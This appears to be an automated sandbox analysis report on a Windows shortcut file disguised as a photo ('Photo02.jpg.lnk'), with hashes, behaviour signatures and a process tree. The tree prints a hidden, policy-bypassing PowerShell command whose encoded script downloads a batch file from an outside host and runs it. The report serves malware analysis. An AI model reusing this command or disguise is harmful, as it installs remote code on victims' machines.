Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    31/01/2024, 08:13

General

  • Target

    Photo02.jpg.lnk

  • Size

    2KB

  • MD5

    a9c696e8139ba0cfdf3241131fff2d1e

  • SHA1

    0607510c26a987944ad5a7da23ebaa69a21e70ed

  • SHA256

    fcb534128c207ff3e66cadc7e6400ce3987374d151aac8e7aa741aadd6a70a88

  • SHA512

    b933fa80f6eb65be5bb05d8cb8e3ebfbe8c97cad970271d7674d33a72bc8426a20ce17be698f35fcc75592dd479bb80579ceee2454ee4af1c80c616b84cd57ad

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3012

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/3012-40-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

          Filesize

          2.9MB

        • memory/3012-41-0x0000000002490000-0x0000000002498000-memory.dmp

          Filesize

          32KB

        • memory/3012-42-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

          Filesize

          9.6MB

        • memory/3012-43-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-45-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-44-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

          Filesize

          9.6MB

        • memory/3012-46-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-47-0x00000000024C0000-0x0000000002540000-memory.dmp

          Filesize

          512KB

        • memory/3012-48-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

          Filesize

          9.6MB